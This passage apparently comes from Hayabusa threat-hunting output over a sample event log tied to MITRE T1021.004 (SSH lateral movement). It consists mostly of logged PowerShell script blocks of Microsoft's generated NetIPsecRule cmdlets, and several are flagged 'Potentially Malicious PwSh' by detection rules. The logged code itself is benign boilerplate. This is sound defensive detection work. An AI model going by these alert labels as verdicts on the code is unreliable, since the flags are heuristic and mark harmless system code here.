[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 